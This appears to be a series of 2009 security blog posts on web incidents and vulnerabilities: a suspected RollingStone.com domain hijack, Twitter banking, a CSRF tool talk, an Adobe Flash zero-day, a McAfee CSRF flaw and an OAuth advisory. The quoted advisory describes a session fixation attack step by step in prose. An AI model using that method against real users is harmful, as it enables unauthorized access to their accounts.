When surfing about the tubes I heard from a few people that something was amiss with RollingStone.com. So, I figured I’d wander over and have a look. The above screen shot was what was the screen cap that I grabbed at 3:08 pm (EST) today. Um, fairly certain that isn’t the standard home page.
So, did they forget to pay the bill? A quick check on the Network Solutions Whois.
Odd, things seem to be in order.
Hmm, a link on the “parked page” redirects to this domain
Registration Service Provided By: RESELLERCLUB
Contact: +1.4152361970
Website: http://www.resellerclub.comDomain Name: SEARCHIGNITED.COM
Registrant:
PrivacyProtect.org
Domain Admin ********@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676Creation Date: 26-May-2009
Expiration Date: 26-May-2010Domain servers in listed order:
ns2.cnomy.com
ns1.cnomy.com
OK, so let’s dig into the Network Solutions graphic from the top right hand side of the page.
Nope, that’s not right at all. Things are looking dubious.
Has Rollingstone been hacked?
UPDATE: When I tried to bring up the web page for the listed parent company of RollingStone.com, Wenner Media, I was greeted by this error page.
Thanks to Amber Baldet, one of the folks I mentioned earlier, for her screen cap.
UPDATE 2: I checked the Rolling Stone twitter feed. They confirmed the site outage. No official word as to why, yet.
UPDATE 3: Apparently, the problem is that “It’s just a technical problem — we’ll be up shortly,” he said. The domain name has been renewed and is current, he said.” (Thx Axel)
Renewed? Um, according to the domain record it was last updated August 2009 and won’t expire until 2011. I’m calling bullshit on the response from Wenner Media. And how exactly does a “glitch” replace an entire website with one of dubious origin? Not to mention resolve to an IP address 209.62.20.200 which, until earlier today, rollingstone.com resolved to either 88.221.94.201 or 88.221.94.248 and had done so since January 15th. I’ve grabbed a copy of the home page for posterity.
Please refrain from urinating on my leg and telling me it’s raining.
Wow. How is this for a REALLY bad idea?
From Vantage Credit Union website:
Introducing tweetMyMoney, available exclusively to Vantage members!
With tweetMyMoney, you can monitor your account balance, deposits, withdrawals, holds and cleared checks with simple commands. And, you can even transfer funds within your account. It’s all available on Twitter, 24/7! And, the best part is, our tweetMyMoney service is free!
So how is this mobile? If your phone can send and receive text messages and you’re on Twitter, you’re in! tweetMyMoney uses Twitter’s Direct Message feature to return the account information you request.
Hell, you can even follow them on Twitter. I wonder if their followers would make for a nice target list. Hmm? As RSnake so aptly put it, “bound to end well :-/”. (HT to RSnake)
So, what could possblie go wrong?
Oops.
What could possibly go wrong?
Weaponizing the Web – Shawn Moyer & Nathan Hamiel
Nathan and Shawn were two of my favorite speakers so far. They both are very smart and awesome guys, buy them beer 
On that note, their talk about weaponizing the web was pretty damn cool to sit in on. For the majority of their talk they reviewed why the social web is such an easily corruptible environment. User Generated Content on an increasing number of supremely popular sites being the giant attack surface. User driven, social, collaborative content, blogs, wikis, and web communities are everywhere you look. Sometimes these things are even being integrated into “old” web media.
Some examples of issues that have popped up in recent times that Nathan and Shawn covered were Moot being voted as the Time’s person of the year, Post Micheal Jackson celebrity death hoaxes causing “legitimate” news sources to run false stories (RIP Jeff Goldblum), and New York Times aggregation fail where an article about HTML injection propagated HTML injection.
The emerging socialized web is creating a popular platform for multi-site aggregation which in the attacker’s eyes equals return on investment. Multi-point attack surfaces, APIs, “Digg This!”, etc.
“Malware-like” legitimate functionality is becoming more widely accepted as tolerable, such as silent updates, calling home, and offsite links.
Here is the awesome part, Nathan has released a new tool. He calls it MonkeyFist and it is a PoC Dynamic CSRF Tool. It includes a small python web server, creates payload/patterns based on referrer, automates per-request “dynamic” CSRF, and constructs hidden POSTS & redirects.
Wow. Again with the Adobe problems? This zero day broke yesterday and of course being in meetings all day, I missed it. It has been a rather rough year for Adobe products. When will this get better for them and, by extension, all of us?
From CNET:
Researchers on Wednesday said they have uncovered attacks in the wild in which malicious Acrobat PDF files are exploiting a vulnerability in Flash and dropping a Trojan onto computers.
The situation could affect tons of users since Flash exists in all popular browsers, is available in PDF files, and is largely operating system-independent.
Any software that uses Flash could be vulnerable to the attack, according to Symantec.
Here is a link to a PoC of the Adobe Flash exploit. And here is the advisory over on Secunia.
So when dealing with the problem of SSL MITM, as Alex Sotirov and Mike Zusman will be speaking on at Black Hat, Verisign’s marketing felt that securing wireless access points would be the solution.
Arooo?
From The Tech Herald:
“The answer is to lock down these other security deficiencies. We can combat malware through a variety of methods like desktop and edge malware detectors, malware crawls available to site operators, and Extended Validation code signing. We can combat rogue hotspots through authentication initiatives such as the one surrounding the emerging WiMAX standard. WiMAX requires full authentication certificates to be available on all hotspots; in a world where consumers only trusted WiMAX hotspots the attack described here wouldn’t be possible. Those are the new frontiers in ensuring a secure online ecosystem,” Callan added.
Alex was good enough to respond to the article in the comment section as follows.
Tim Callan’s suggestion that to prevent SSL MITM attacks we need to first solve the problem of rogue access points is so ridiculous that I can’t even start to explain all the ways in which it’s wrong.
Sotirov from with the three pointer! Nothing but net.
Billy Hoffman has released some research. This time around he and a fellow researcher have found a way to create a darknet using browsers. Reminds me of a project called Peekabooty which, sadly, is no longer supported.
I’m looking forward to the Black Hat presentation this summer as I’m curious how this differs from the plethora of other options out there.
From Dark Reading:
A pair of researchers has discovered a way to use modern browsers to more easily build darknets — those underground, private Internet communities where users can share content and ideas securely and anonymously.
Billy Hoffman, manager for HP Security Labs at HP Software, and Matt Wood, senior security researcher in HP’s Web Security Research Group, will demonstrate a proof-of-concept for Veiled, a new type of darknet, at the Black Hat USA conference in Las Vegas next month. Darknets, themselves, are nothing new; networks like Tor, FreeNet, and Gnutella are well-established. The HP researchers say Veiled is the same idea, only much simpler: It doesn’t require any software to participate, just an HTML 5-based browser. “We’ve implemented a simple, new darknet in the browser,” Wood says. “There are no supporting [software] programs.”
Except the browsers…
Like I said, I’ll wait until Black Hat.
(Image from Darknetportal Flickr feed CC)
I’m late to the party with this article.
Apparently, there are hackers that are ill disposed to the US. Who knew?
From Information Week:
The hackers, who collectively go by the name “m0sted” and are based in Turkey, penetrated servers at the Army’s McAlester Ammunition Plant in McAlester, Okla., and at the U.S. Army Corps of Engineers’ Transatlantic Center in Winchester, Va.
The breach at the McAlester munitions plant occurred on Jan. 26, according to records of the investigation obtained by InformationWeek. On that date, Web users attempting to access the plant’s site were redirected to a Web page that featured a protest against climate change.
On Sept. 19, 2007, the same hackers electronically broke into Army Corps of Engineers’ servers.
Interesting. I’m used to the “Pwned by $SCRIPTKIDDIE” type of defacement. A redirect to a page on climate change? OK, I’ll admit that’s a new one for me.
More on that story,
Investigators believe the hackers used a technique called SQL injection to exploit a security vulnerability in Microsoft’s SQL Server database to gain entry to the Web servers. “m0sted” is known to have carried out similar attacks on a number of other Web sites in the past — including against a site maintained by Internet security company Kaspersky Lab.
Ah! Now a remember these characters. Maybe the DoD can use some 31337 cops.
Sorry, had to tie that image in somehow.
There are times when a picture really is worth a thousand words.
Starting off with one of my favourites.
D’oh!
Um, embarrassing, no?
From Heise:
According to an old proverb ‘The cobbler has the worst shoes’. It’s now been reported that Secure, McAfee’s security portal, has had poor shoes or rather poor security, because until recently it displayed a vulnerability to cross-site request forgery (CSRF).
McAfee Secure is a service that lets clients use the Hacker Safe tool to check their sites or online shops for security vulnerabilities and for compliance with the PCI Data Security Standard, which is important for credit-card transactions. If the check shows sites are OK, shop operators can include the McAfee Secure logo in their web site. This is supposed to reassure their customers that their data is well protected and there’s no danger lurking in transactions, such as making payments.
I’m not going to go on about this one. Here is more from others. But, I have renewed faith in the the Nate McFeter’s Certified and Scanless PCI programs.
Ah, open standards. They’re fabulous, aren’t they? Take OAuth for instance. Idealism and interoperability! What’s the gist behind OAuth? Well…
Imagine you’ve got a service that allows you to, say, microblog your life. Then you’ve got another service that allows you to post and share photos on the Internet. You want to make these two services work together — when you upload a new image, the photo sharing service should update the microblogging service to notify your friends about it. Now, maybe the photo sharing service wants your microblog credentials, but you don’t want to give them up. Ah, but it turns out both services support OAuth! So, you tell the photo sharing service about your microblogging service, the microblogging service asks you if you want to grant the photo sharing service access, they exchange some information, and voila: the photo sharing service can notify your friends about your uploads without ever knowing your password!
This concept is so simple, so effective that it makes sense for it to eventually catch on. Sure, OAuth popped up here and there, but what seems to have pushed it into the mainstream was its adoption by Twitter. As a public beta, Twitter recently started supporting OAuth in their service, a well received move. But on the morning of April 22, Twitter unexpectedly pulled the plug on the protocol, as noted by TechCrunch; a comment on the TechCrunch story noted that Yahoo’s OAuth support had been yanked, too. One TechCrunch reader noted that it “sounds like there’s some massive security hole they’re busily patching up.”
It wasn’t but a few hours later when CNET broke the news that the real issue was, indeed, security-related:
A security hole in OAuth, the open-source protocol that acts as a “valet key” for users’ login information, has led services like Twitter and Yahoo to temporarily pull their support, CNET News has learned…. In the interest of online safety, CNET News has chosen not to make the details of the security hole public. Here are the basics: The hole makes it possible for a hacker to use social engineering tactics to trick users into exposing their data.
Twitter even issued an official stance on the whole debacle over at their blog:
This week, we received word from the folks at OAuth that they were looking closely at a security issue within the protocol. We take security seriously and felt the responsible thing to do was temporarily disable OAuth while this matter was sorted out. Yahoo and others made similar decisions.
“Yes, yes, that’s all well and good, you waffle-faced bastard, but what’s the issue?!” Well, it all comes down to a token, of course. Per the OAuth advisory*, released on Thursday, April 23 at 03:00 AM EDT (12:00 AM PDT), there exists a nasty, but obvious-in-the-way-the-spec-is-written-good-deity-how-did-this-get-overlooked, session fixation vulnerability:
The attack starts with the attacker logging into an account he owns at the (honest) Consumer site. The attacker initiates the OAuth authorization process but rather than follow the redirect from the Consumer to obtain authorization, the attacker instead saves the authorization request URI (which includes the Request Token). Later, the attacker convinces a victim to click on a link consisting of the authorization request URI to approve access to the victim’s Protected Resources to the (honest) Consumer.
By clicking on the link, the victim continues the request that the attacker initiated, including the Request Token that the (honest) Consumer issued to the attacker. Note that the victim is redirected to the legitimate approval page at the Service Provider and prompted by the Service Provider to approve the (honest) Consumer. It is not possible for the victim to detect that there is an ongoing attack.
After the victim grants approval, the attacker can use the saved Request Token to complete the authorization flow, and access whatever Protected Resources are exposed by the (honest) Consumer site as part of its service.
XSRF protections at the Consumer site do not mitigate against this attack.
(Update 2009-04-23 06:33) — The OAuth advisory also points to a more detailed analysis of the attack over at Hueniverse. I recommend reading this as well.
As someone who advocates open standards such as OAuth and OpenID, which are oftentimes used as complements to one another, it pains me to see such a nasty flaw rear its head — especially right after it seemed to be getting some traction. A revised OAuth specification is forthcoming that should address this issue.
* – please note that we honoured the timeframe set forth by OAuth by publishing this post only when the officialy advisory had been released. (And no, we did not discover this flaw. We merely had, uh, accurate discussion and speculation around it.)
